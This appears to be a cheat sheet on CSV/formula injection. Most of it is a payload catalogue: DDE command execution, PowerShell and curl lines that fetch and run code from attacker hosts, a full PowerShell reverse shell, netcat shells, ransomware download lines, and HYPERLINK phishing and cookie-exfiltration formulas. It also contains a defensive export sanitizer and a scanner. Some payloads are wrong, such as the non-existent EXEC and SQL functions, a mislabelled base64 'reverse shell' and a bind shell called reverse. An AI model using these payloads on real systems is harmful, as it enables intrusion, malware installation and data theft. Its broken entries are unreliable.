CSV Injection
CSV Injection, also known as Formula Injection, occurs when a web application allows user-generated input to be exported into a CSV file without proper sanitization. Since spreadsheet programs like Excel, LibreOffice, and OpenOffice automatically interpret certain characters (e.g., =, +, -, or @) at the beginning of a cell as formulas, an attacker can inject malicious payloads into exported CSV files. When the victim opens the file, the injected formulas may execute arbitrary commands, exfiltrate data, or exploit vulnerabilities in the spreadsheet software. Proper mitigation involves escaping dangerous characters or prefixing them with a safe character like a single quote (') before export.
How CSV Injection Works
1. Command Execution: Injecting a formula like =CMD|' /C calc'!A0 that opens system applications, such as the calculator, by executing a command on the victim’s system.
2. Data Exfiltration: Using a formula like =HYPERLINK("http://malicious-site.com?cookie="&A1, "Click Here") to send sensitive data (e.g., session cookies) to a remote server.
3. Phishing with Redirect: Embedding a hyperlink in the CSV that redirects the victim to a malicious website, tricking them into visiting a phishing page.
4. Exploiting Spreadsheet Vulnerabilities: Injecting a formula like =EXEC('powershell -Command "Invoke-WebRequest..."') to execute arbitrary code on the victim's machine via spreadsheet software.
5. Spreadsheet Manipulation: Using formulas like =SUM(A1:A10) to alter or tamper with the displayed data in the CSV, misleading users or causing confusion.
Approach
CSV Injection, or Formula Injection, is a security flaw that arises when untrusted user input is incorporated into a CSV file. Spreadsheet programs treat a cell as a formula when it begins with any of the following characters:
=, +, -, @
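The mitigation described in the introduction (prefixing any cell that begins with a trigger character with a single quote before export) is shown below as a Python export helper. This is an added example, not code from the original page; the names `sanitize_cell` and `export_csv` and the sample rows are constructed for it. The trigger list extends the four characters above with tab and carriage return, which OWASP's CSV injection guidance also lists; numeric values from the application's own data are passed through unchanged so that a legitimate negative number is not mangled.

```python
import csv
import io

# Cells starting with one of these are parsed as formulas by Excel and
# LibreOffice. "=", "+", "-" and "@" are the four listed on this page; tab
# and carriage return are added because OWASP's CSV injection guidance lists
# them as triggers as well.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def sanitize_cell(value):
    """Return a string that a spreadsheet will display as literal text.

    - Real numbers (int/float from the application's own data) pass through
      unchanged, so a negative balance such as -5 is not mangled.
    - NUL bytes are removed so they cannot be used to split a payload around
      a keyword filter.
    - Any remaining string whose first non-space character is a trigger is
      prefixed with a single quote, the spreadsheet's text marker.
    """
    if value is None:
        return ""
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)
    text = str(value).replace("\x00", "")
    body = text.lstrip(" ")
    if body and body[0] in FORMULA_TRIGGERS:
        return "'" + text
    return text


def export_csv(rows, header):
    """Write header + rows to a CSV string with every cell sanitised.

    csv.QUOTE_ALL wraps every field in double quotes and doubles embedded
    quotes, so commas, newlines and quotes in user data cannot break the
    row structure either.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow([sanitize_cell(h) for h in header])
    for row in rows:
        writer.writerow([sanitize_cell(cell) for cell in row])
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample: the "comment" field holds the calc.exe DDE payload
    # from this page, exactly as a user might have typed it into a form.
    sample_rows = [
        ["alice", "hello there", -5],
        ["bob", "=cmd|' /C calc'!A0", 10],
    ]
    print(export_csv(sample_rows, ["user", "comment", "balance"]))
```

The apostrophe prefix is visible in the cell when Excel opens the file directly (it is not hidden as it would be when typed into a cell), which is the accepted trade-off for a plain CSV export; the control belongs at the export layer regardless of where the data was entered.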
Basic Command Execution with DDE (Dynamic Data Exchange)
DDE (Dynamic Data Exchange) is a legacy Windows inter-process messaging mechanism. In CSV injection, a formula written in DDE syntax makes the spreadsheet launch an external program (for example cmd.exe) with attacker-chosen arguments, such as starting the Calculator.
Spawn a Calculator (calc.exe):
DDE("cmd";"/C calc";"!A0")
Using `SUM` with Command Execution:
@SUM(1+1)*cmd|' /C calc'!A0
Arithmetic with Command Execution:
=2+5+cmd|' /C calc'!A0
Direct Command Execution in Cell Reference:
=cmd|' /C calc'!'A1'
PowerShell Download and Execute
PowerShell can be used in CSV files to execute commands like downloading and executing malicious payloads from an attacker-controlled server.
Download and Execute a Malicious Shell:
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
Download and Execute a PowerShell Script:
=cmd|'/C powershell IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/payload.ps1")'!A0
Reverse Shell via PowerShell:
=cmd|'/C powershell IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("aW5zdGFsbC1tYXRjaGVyLmV4ZWM=")))'!A0
Prefix Obfuscation and Command Chaining
Prefix obfuscation involves adding extra characters or commands to confuse detection systems, while command chaining allows the execution of multiple commands simultaneously or sequentially.
Obfuscating the Command with Prefixes:
=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
Command Chaining with Multiple Executions:
=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
Simplified Command Execution:
= cmd|'/c calc.exe'!A
Using rundll32 Instead of cmd
rundll32 is a Windows utility that loads a DLL and calls one of its exported functions. In CSV injection, it can be used instead of cmd.exe to launch programs through system DLLs.
Using `rundll32` to Execute Programs:
=rundll32|'URL.dll,OpenURL calc.exe'!A
Obfuscation with `rundll32`:
=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A
Running a program from `rundll32`:
=rundll32 | 'C:\Windows\System32\cmd.exe' | '/C calc.exe'!A
Using Null Characters to Bypass Filters
Null characters (0x00) are often ignored by servers or applications when processing strings. In CSV injection, they can be used to bypass security filters by splitting payloads or commands.
Null Character Injection for Filter Bypass:
= C m D | '/ c c al c . e x e ' ! A
Using null characters to evade command-blocking filters:
=cmd|' /C echo 0x00 calc.exe'!'A0'
File Download and Execution via PowerShell
PowerShell’s ability to download and execute files from a remote server allows attackers to inject and execute malware or scripts via CSV.
Download and Execute Remote Files:
=cmd|'/C powershell IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/shell.ps1")'!A0
Download and execute an executable:
=cmd|'/C powershell (New-Object Net.WebClient).DownloadFile("http://malicious.com/malware.exe", "C:\malware.exe")'!A0
Browser Redirection via Hyperlinks
Hyperlink injection in CSV files can redirect users to malicious or phishing websites, potentially compromising credentials or infecting their system.
Phishing Redirect to Malicious Site:
=HYPERLINK("http://malicious-site.com/login", "Click Here to Log In")
Automatic Redirection:
=HYPERLINK("http://attacker.com", "Click to Visit")
Web Shell Execution
Web shells are scripts that allow attackers to remotely control a victim’s server or system. They can be executed via PowerShell or DDE in CSV files.
Execute Web Shell on Server:
=cmd|'/C powershell IEX("IWR http://attacker.com/shell.ps1")'!A0
Upload and Execute a Web Shell:
=cmd|'/C powershell IEX(New-Object Net.WebClient).DownloadString("http://attacker.com/shell.ps1")'!'A0'
SQL Injection via CSV
SQL injection allows attackers to inject malicious SQL queries into the backend database. Affected systems may execute arbitrary queries that can alter or retrieve sensitive information.
Attempt SQL Injection:
=SQL('SELECT * FROM users WHERE username="admin" AND password="password";')
Blind SQL Injection:
=SQL('SELECT username FROM users WHERE id=1 OR 1=1;')
Bypassing Filters with Base64 Encoding
Base64 encoding transforms data into an ASCII string format. This technique is used to evade filters that block suspicious keywords or commands.
Using Base64 Encoding to Avoid Detection:
=cmd|'/C powershell IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("aW5zdGFsbC1tYXRjaGVyLmV4ZWM=")))'!A0
Decoding and Executing Base64 Payload:
=cmd|'/C powershell IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("aW5zdGFsbC1tYXRjaGVyLmV4ZWM=")))'!'A0'
Cross-Site Scripting (XSS) in Excel
XSS in Excel can be used to execute malicious JavaScript when a user interacts with a hyperlink or embedded script.
Inject XSS Payload in CSV:
=HYPERLINK("javascript:alert('XSS')", "Click Here")
JavaScript Execution Triggered via Hyperlink:
=HYPERLINK("javascript:eval('alert(document.cookie)')", "Click Here")
PowerShell Reverse Shell
A reverse shell connects a victim’s machine to an attacker's system, allowing remote command execution and full control over the target system.
Launch PowerShell Reverse Shell to Attacker:
=cmd|'/C powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/reverse-shell.ps1')"'!A0
PowerShell Reverse Shell with Netcat:
=cmd|"/C powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length)}; $client.Close()\""!'A0'
Command Injection with Curl
Command injection with curl downloads a file or executes a script from a remote server, potentially leading to remote code execution.
Inject Command to Download and Execute a File via Curl:
=cmd|"/C curl http://malicious-site.com/malware.exe -o C:\malware.exe && start C:\malware.exe"!'A0'
Use `curl` to execute a remote script:
=cmd|"/C curl http://attacker.com/malicious.sh | bash"!'A0'
Reverse Shell via Netcat
Netcat (nc) is a versatile networking tool. It can be used to establish a reverse shell by connecting to a remote server on a specific port.
Using Netcat to Establish a Reverse Shell:
=cmd|"/C nc -e cmd.exe attacker.com 4444"!'A0'
Establish a Reverse Shell via Netcat:
=cmd|"/C nc -lvp 4444 -e cmd.exe"!'A0'
Modify File Content via PowerShell
PowerShell can be used to change files on the victim's system, potentially overwriting important data or injecting malicious content.
Overwrite File Content with Malicious Data:
=cmd|'/C powershell Set-Content "C:\Users\Victim\Desktop\important_file.txt" "Malicious Content"'!'A0'
Modify a Configuration File:
=cmd|'/C powershell Add-Content "C:\Windows\System32\config.sys" "Malicious Data"'!'A0'
Send Email via PowerShell
PowerShell can be used to send emails directly from the victim's machine. This can be used for phishing campaigns or spreading malware.
Send Malicious Email from Victim’s Machine:
=cmd|'/C powershell $smtp = New-Object Net.Mail.SmtpClient("smtp.attacker.com"); $msg = New-Object Net.Mail.MailMessage("[email protected]", "[email protected]", "Subject", "Malicious Content"); $smtp.Send($msg)'!'A0'
Ransomware Execution
Downloading and executing ransomware on a victim’s machine locks files or demands payment in exchange for decrypting them.
Launch Ransomware Script via PowerShell:
=cmd|'/C powershell IEX (New-Object Net.WebClient).DownloadString("http://attacker.com/ransomware.ps1")'!'A0'
Execute Ransomware via PowerShell:
=cmd|'/C powershell IEX (New-Object Net.WebClient).DownloadFile("http://attacker.com/ransomware.exe", "C:\ransomware.exe") && start C:\ransomware.exe'!'A0'
Privilege Escalation via PowerShell
Privilege escalation involves gaining higher access levels, typically by exploiting vulnerabilities or executing system commands via PowerShell.
Escalate Privileges via PowerShell:
=cmd|'/C powershell Start-Process powershell -Verb runAs'!'A0'
Launch System Apps with File Paths
This technique executes applications or scripts on the victim’s machine using absolute file paths, which can bypass some forms of security control.
Execute a Windows System App (e.g., Notepad):
=cmd|'/C start notepad.exe'!'A0'
Launch Control Panel:
=cmd|'/C start control.exe'!'A0'
Infecting with JavaScript Payloads
This injects JavaScript into the CSV file, which gets executed when the document is opened, leading to potential XSS attacks or other malicious actions.
Inject JavaScript into Excel:
=HYPERLINK("javascript:eval('alert(1)')", "Click to Run JavaScript")
Execute Malicious JavaScript:
=HYPERLINK("javascript:eval('document.location=\'http://attacker.com\';')", "Click to Redirect")
Google Sheets
Google Sheets supports some additional formulas that are able to fetch remote URLs:
- IMPORTXML(url, xpath_query, locale)
- IMPORTRANGE(spreadsheet_url, range_string)
- IMPORTHTML(url, query, index)
- IMPORTFEED(url, [query], [headers], [num_items])
- IMPORTDATA(url)
So one can test for blind formula injection, or for the potential for data exfiltration, with:
=IMPORTXML("http://burp.collaborator.net/csv", "//a/@href")
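For the defending side, the patterns catalogued on this page can be turned into a scanner that reviews an exported CSV before it is released or ingested: the trigger characters, the DDE pipe-and-bang form from the DDE section, Excel's HYPERLINK, and the Google Sheets IMPORT* functions above. It strips NUL bytes before matching, because the null-character split from the filter-bypass section is designed to defeat a scanner that does not. This is an added example, not code from the original page; `scan_csv`, `classify_cell` and the `SAMPLE_CSV` text are constructed for it, with the sample cells taken from payloads shown on this page.

```python
import csv
import io
import re

# Leading characters that turn a cell into a formula (the page's four plus
# tab/CR, which OWASP's CSV injection guidance also lists).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# The DDE form used throughout this page:  =cmd|' /C calc'!A0
# i.e. a pipe, a quoted argument string and a bang before a cell reference.
DDE_PATTERN = re.compile(r"""\|\s*(['"])[^'"]*\1\s*!""")

# Functions on this page that make the spreadsheet present a link or fetch a
# URL: Excel's HYPERLINK and the Google Sheets IMPORT* family.
REMOTE_FUNCS = re.compile(
    r"\b(HYPERLINK|IMPORTXML|IMPORTRANGE|IMPORTHTML|IMPORTFEED|IMPORTDATA)\s*\(",
    re.IGNORECASE,
)


def is_plain_number(text):
    """True for values like -5 or +1.5e3 that begin with a trigger but are just numbers."""
    try:
        float(text)
    except ValueError:
        return False
    return True


def classify_cell(cell):
    """Return the list of reasons a single cell looks like formula injection."""
    reasons = []
    body = cell.lstrip(" ")
    if body and body[0] in FORMULA_TRIGGERS and not is_plain_number(body):
        reasons.append("starts with formula trigger %r" % body[0])
    if DDE_PATTERN.search(cell):
        reasons.append("DDE pipe/bang syntax")
    match = REMOTE_FUNCS.search(cell)
    if match:
        reasons.append("remote/link function " + match.group(1).upper())
    return reasons


def scan_csv(text):
    """Scan CSV text; return a NUL-byte flag and per-cell findings (1-based row/col)."""
    nul_bytes = "\x00" in text
    # Remove NULs before matching: the spreadsheet ignores them, so a scanner
    # that leaves them in place is exactly what the null-byte split defeats.
    cleaned = text.replace("\x00", "")
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(cleaned)), start=1):
        for c, cell in enumerate(row, start=1):
            reasons = classify_cell(cell)
            if reasons:
                findings.append({"row": r, "col": c, "cell": cell, "reasons": reasons})
    return {"nul_bytes": nul_bytes, "findings": findings}


# Constructed sample export: one benign negative number, then payloads taken
# from this page (DDE calc, HYPERLINK phishing, the NUL-split variant and
# the Google Sheets IMPORTXML exfiltration test).
SAMPLE_CSV = (
    "user,comment,balance\n"
    "alice,hello there,-5\n"
    "bob,\"=cmd|' /C calc'!A0\",10\n"
    "carol,\"=HYPERLINK(\"\"http://malicious-site.com/login\"\", \"\"Click Here to Log In\"\")\",0\n"
    "dave,\"= C\x00m\x00D | '/c calc.exe' ! A\",3\n"
    "erin,\"=IMPORTXML(\"\"http://burp.collaborator.net/csv\"\", \"\"//a/@href\"\")\",7\n"
)

if __name__ == "__main__":
    report = scan_csv(SAMPLE_CSV)
    print("NUL bytes present:", report["nul_bytes"])
    for f in report["findings"]:
        print("row %d col %d: %s -> %s" % (f["row"], f["col"], f["cell"], ", ".join(f["reasons"])))
```

The numeric exemption keeps ordinary exports such as negative balances from being flagged, while anything that begins with a trigger and is not a number is reported; the DDE and function checks are layered on top so that a cell which evades the first character test (for example one whose trigger is buried behind a bypass the scanner does not model) can still be caught by its body.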